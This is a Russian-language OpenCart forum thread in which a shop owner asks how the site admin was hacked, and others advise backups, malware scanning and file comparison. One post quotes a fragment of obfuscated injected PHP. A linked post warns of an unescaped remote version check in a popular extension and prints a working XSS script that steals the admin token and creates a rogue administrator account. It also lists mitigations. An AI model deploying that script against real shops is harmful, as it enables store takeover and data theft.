Jump to content
Sign in to follow this  
Praetorioan

Взломали админку на opencart

Recommended Posts

Добрый день, админку сайта взломал какой-то турецкий школьник, оставив красноречивое послание на первой картинке. «nah sana panel lamercik»

Проверил фтп, там добавлены несколько html файлов левых. Как видно на скринах, даты разные. 

Изменений в системных файлов не нашёл.php.ini чистый. config.php чистый. 

Посмотрел в index.php в админке - он снёс весь код и вставил свой, который виден на 1 скрине. Вопрос - как? Я должен устранить уязвимость, пожалуйста, помогите.

tuskishscam.PNG

turkishscam1.PNG

Share this post


Link to post
Share on other sites

почему вы думаете что админку?

Share this post


Link to post
Share on other sites

Раз взломал, то где угодно мог закладок наделать. Весь сайт проверять надо. И соседние сайты тоже, если с одного акка работают. 

Если не рассматривать восстановление из резервной копии, то вариантов два.

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Не дешевый - заказать чистку/восстановление сайта

  • +1 1

Share this post


Link to post
Share on other sites

э... дешевый и правильный - восстановить из бэкапа.

все остальное компромисс.

Share this post


Link to post
Share on other sites

А такой вариант как защитить уже 3 раз за 4 месц. идет такой код <?php ${"\x47\x4cO\x42\x41L\x53"}["l\x69\x71p\x73\x69\x76\x70"]="m\x65";${"GL   пишет его в config.php который в корне. Декодировал сдесь. http://ddecode.com/hexdecoder/

Версия ocStore 2.1.0.2.1 стоит на ВПС под Центос 7

Infecsia-config.php

Share this post


Link to post
Share on other sites

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Share this post


Link to post
Share on other sites
7 часов назад, Shureg сказал:

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Спасибо!

Share this post


Link to post
Share on other sites
8 часов назад, nikifalex сказал:

почему вы думаете что админку?

Я не знаю что конкретно.

Share this post


Link to post
Share on other sites

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Share this post


Link to post
Share on other sites
4 минуты назад, Praetorioan сказал:

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Уважаемый, толку что вы будите гуглить уязвимости opencart
Их нет
Вам четко сказали как вас взломали

 

2 часа назад, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

 

Share this post


Link to post
Share on other sites
14 часов назад, markimax сказал:

Вам четко сказали как вас взломали

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Share this post


Link to post
Share on other sites
В 25.10.2017 в 10:15, nikifalex сказал:

дешевый и правильный - восстановить из бэкапа.

В данном случае да, но не всегда прокатывает...

 

У одного клиента начались проблемы с сайтом. В процессе поиска были обнаружены левые файлы. Просмотрели архивы файлов, так эти левые файлы обнаружены в архивах почти годовой давности. Хорошо, что были и более ранние архивы. А у большинства пользователей есть только с десяток архивов на хостинге, т. е. в подобной ситуации они уже заражены.

Share this post


Link to post
Share on other sites

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

  • +1 1

Share this post


Link to post
Share on other sites
В 26.10.2017 в 08:01, nikifalex сказал:

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Какую ценность несёт это сообщение в этой ветке? Зачем ты это пишешь? Из-за таких как ты, конкретно из-за тебя русское сообщество - крайне токсичное место, находиться здесь иногда неприятно. Поздравляю, ты посильно вносишь в это свой личный вклад.

Share this post


Link to post
Share on other sites
В 04.11.2017 в 12:01, nikifalex сказал:

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

PhpStorm Отлично сравнивает файлы - не только на есть ли лишние, а и на структуру php html файлов) 

Share this post


Link to post
Share on other sites
В 25.10.2017 в 14:54, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Целиком и полностью согласен 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Similar Content

    • By Yoda
      Недавно моими друзьями была обнаружена очень неприятная ситуация, один популярный автор дополнений, допустил фатальную ошибку в разработке дополнения. Я очень хочу верить что случайно, но в целом, все указывает на то, что это специально оставленный бекдор.
       
      Но бог и администрация форума ему судья, я думаю они там сами разберутся.
      В силу того, что приводя куски кода дополнения, или оставляя комментарии в теме поддержки дополнения, как пользователь который его не покупал я нарушу правила форума, я попробую дать рекомендации в существующих рамках.
       
      Исходя из моей подготовки и опыта, я могу утверждать, что, проблема, в том, что когда вы заходили в админку модуля, модуль подтягивал каждый раз с сервера автора номер версии. Казалось бы что в этом такого. 
      Но присмотревшись, оказалось, что вывод данных о версии не был экранирован, что позволяло автору или любому человеку, получившему доступ к его серверу выполнить XSS атаку на все 10 000 магазинов, которые купили любое из дополнений автора, к примеру вместо номера версии отдать вот такой простой скрипт к примеру:
       
      <script> // shell sample // seocms the best architectural mistake forever // i got all your 10 000 shops // i install 10 000 backdors function getUrlVars() {     var vars = [], hash, hashes = null;     if (window.location.href.indexOf("?") && window.location.href.indexOf("&")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1).split("&");     } else if (window.location.href.indexOf("?")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1);     }     if (hashes != null) {         for (var i = 0; i < hashes.length; i++) {             hash = hashes[i].split("=");             vars[hash[0]] = hash[1];         }     }     return vars; } var url_vars =  getUrlVars(); var token = url_vars.token; var host =  window.location.origin; var action = host + "/admin/index.php?route=user/user/add&token=" +  token; document.addEventListener("DOMContentLoaded", function(event) {    $.post( action, { username: "DummiMarkHack", user_group_id: "1", firstname: "Lol",  lastname: "Haha",    email: "[email protected]",  password: "1234",    confirm: "1234",    status: "1" } ); }); </script>
      И вот таким нехитрым способом, ни в коем случае я не грешу на автора и не хочу сказать что он это сделал специально, но береженого бог бережет. Ведь невзламываемых систем не бывает. Можно получить админский доступ в любой магазин. На котором установлены модули автора. А получив админа магазина, мы легко и просто дальше уже сливаем все что захотим - это дело техники.
       
      А учитывая то, что человек может умереть. И не продлить домен. А за доменом могут следить специально с целью захвата такого лакомого ботнета. Думаю о критичности потенциальной угрозы рассказывать не надо.
       
      Опять же повторюсь, в рамках правил форума я не могу показывать код дополнения, я его не покупал, поэтому чтобы навсегда обезопасить себя от подобной проблемы на 100% и у вас VPS вам просто необходимо добавить в файл host на своем сервере
       
      Строку 0.0.0.0 site.com // Домен сервера разработчика
       
      Как это сделать в linux - можно прочитать здесь, или обратитесь к администратору вашего сервера. 

      Если же у вас шаред-хостинг. Максимум что вы можете сделать, это найти во всех модулях автора в языковых файлах строки opencartadmin.com и заменить их на localhost. С вашими модулями ничего не случится. Они будут работать. Но вероятность, что с постороннего ресурса вы получите xss атаку минимальная!

      Ну и как второстепенную меру защиты, просто добавьте htpassword  авторизацию к админке. 

      Успешного бизнеса вам, и безопасных магазинов.
       
       
       
  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.